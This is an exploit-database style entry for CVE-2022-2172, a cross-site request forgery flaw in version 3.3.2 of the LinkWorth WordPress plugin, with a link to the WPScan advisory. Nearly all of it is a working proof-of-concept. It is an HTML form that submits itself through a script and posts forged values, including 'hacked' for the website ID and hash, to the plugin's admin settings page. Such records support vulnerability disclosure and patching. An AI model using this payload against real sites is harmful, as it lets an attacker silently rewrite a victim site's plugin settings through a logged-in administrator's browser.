CVE: CVE-2022-2172

Name: LinkWorth Plugin (linkworth-wp-plugin)

Version: 3.3.2

Date: 2022-04-23 20:30:16

Advisory: https://wpscan.com/vulnerability/bfb6ed12-ae64-4075-9d0b-5620e998df74

Type: CSRF

Exploit: 


<form action="https://example.com/wp-admin/admin.php?page=lw-settings" method="POST">
    <input type="text" name="lw_ops[lw_sidebar]" value="0">
    <input type="text" name="lw_ops[lw_sidebarwidget]" value="0">
    <input type="text" name="lw_ops[lw_linktype]" value="0">
    <input type="text" name="lw_ops[website_id]" value="hacked">
    <input type="text" name="lw_ops[website_hash]" value="hacked">
    <input type="text" name="lw_ops[billboard_base]" value="pages">
    <input type="text" name="lw_ops[lw_linkcolor]" value="1">
    <input type="text" name="lw_ops[lw_linksize]" value="12">
    <input type="text" name="lw_update_settings" value="Update Settings »">
</form>
<script>
    document.forms[0].submit();
</script>